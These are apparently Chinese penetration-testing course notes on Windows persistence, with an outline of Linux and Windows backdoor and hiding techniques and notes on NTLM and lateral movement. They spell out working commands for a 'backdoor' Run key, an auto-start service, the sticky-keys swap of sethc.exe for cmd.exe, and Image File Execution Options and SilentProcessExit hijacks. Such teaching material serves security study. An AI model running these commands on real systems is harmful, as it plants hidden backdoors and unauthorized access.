



- Linux 隐藏
 - 隐身登录
 - 隐藏文件
 - 锁定文件
 - 隐藏文件时间戳
 - 隐藏历史操作记录
 - 进程隐藏
 - 端口复用

- Linux后门
 - 添加用户
 - SUID Shell
 - SSH 公钥登录
 - 软链接
 - SSH wrapper
 - strace 后门
 - 定时任务
 - openssh 后门
 - PAM 后门
 - rootkit 后门
 - alias 后门

- Windows 隐藏
 - 文件属性
 - ADS
 - 驱动级文件隐藏
 - 系统文件夹伪装
 - 畸形文件夹
 - 系统保留文件
 - 相似名称

#知识点:

- 1、权限维持-Windows-内网域&单机版
- 2、自启动项目&映像劫持&辅助功能&登录等

权限维持知识点:

系统: Win&Linux

层面: 单机版&域环境&WEB

与 NTLM 认证相关的安全问题主要有 Pass The Hash、利用 NTLM 进行信息收集、Net-NTLM Hash 破解、NTLM Relay 几种。PTH 前期已经了, 运用 mimikatz、impacket 工具包的一些脚本、CS 等等都可以利用, NTLM Relay 又包括 (relay to smb, ldap, ews)

-连接方向: 正向&反向 (基础课程有讲过)

-内网穿透: 解决网络控制上线&网络通讯问题

-隧道技术: 解决不出网协议上线的问题 (利用出网协议进行封装出网)

-代理技术: 解决网络通讯不通的问题 (利用跳板机建立节点后续操作)

#代理隧道系列点:

- 1、判断什么时候用代理
- 2、判断什么时候用隧道
- 3、判断出网和不出网协议
- 4、如何使用代理建立节点并连接
- 5、如何使用隧道技术封装协议上线
- 6、判断哪些代理或隧道情况选择放弃

#横向移动系列点:

系统点:

windows->windows

windows->Linux

linux->windows

linux->linux

详细点:

IPC, WMI, SMB, PTH, PTK, PTT, SPN, WinRM, WinRS, RDP, Plink, DCOM, SSH; Exchange, LLMNR 投毒, NTLM-Relay, Kerberos_TGS, GPO&DAACL, 域控提权漏洞, 约束委派, 数据库攻防, 系统补丁下发执行, EDR 定向下发执行等。

#PTH 在内网渗透中是一种很经典的攻击方式, 原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务, 而不用提供明文密码。

演示案例：

- 权限维持-域环境&单机版-自启动
 - 权限维持-域环境&单机版-粘滞键
 - 权限维持-域环境&单机版-映像劫持
 - 权限维持-域环境&单机版-屏保&登录
-
-

#权限维持-域环境&单机版-自启动

1、自启动路径加载

```
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```

2、自启动服务加载

```
sc create ServiceTest binPath= C:\xd.exe start= auto
sc delete ServiceTest
```

3、自启动注册表加载

-当前用户键值

```
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
```

-服务器键值（需要管理员权限）

```
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
```

-添加启动项

```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"backdoor" /t REG_SZ /F /D "C:\xd.exe"
```

4、计划计时任务

参考前面横向移动课程

#权限维持-域环境&单机版-粘滞键

系统自带的辅助功能进行替换执行，放大镜，旁白，屏幕键盘等均可。

粘滞键位置：

```
c:\windows\system32\sethc.exe
move sethc.exe sethc1.exe
copy cmd.exe sethc.exe
```

#权限维持-域环境&单机版-映像劫持

测试：执行 notepad 成 cmd

```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\notepad.exe" /v debugger /t REG_SZ /d
"C:\Windows\System32\cmd.exe /c calc"
```

配合 GlobalFlag 隐藏：执行正常关闭后触发

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d
512
```

```
reg add "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode
/t REG_DWORD /d 1
```

```
reg add "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit\notepad.exe" /v
MonitorProcess /d "C:\xd.exe"
```

涉及资源：

[补充：涉及录像课件资源软件包资料等下载地址](#)
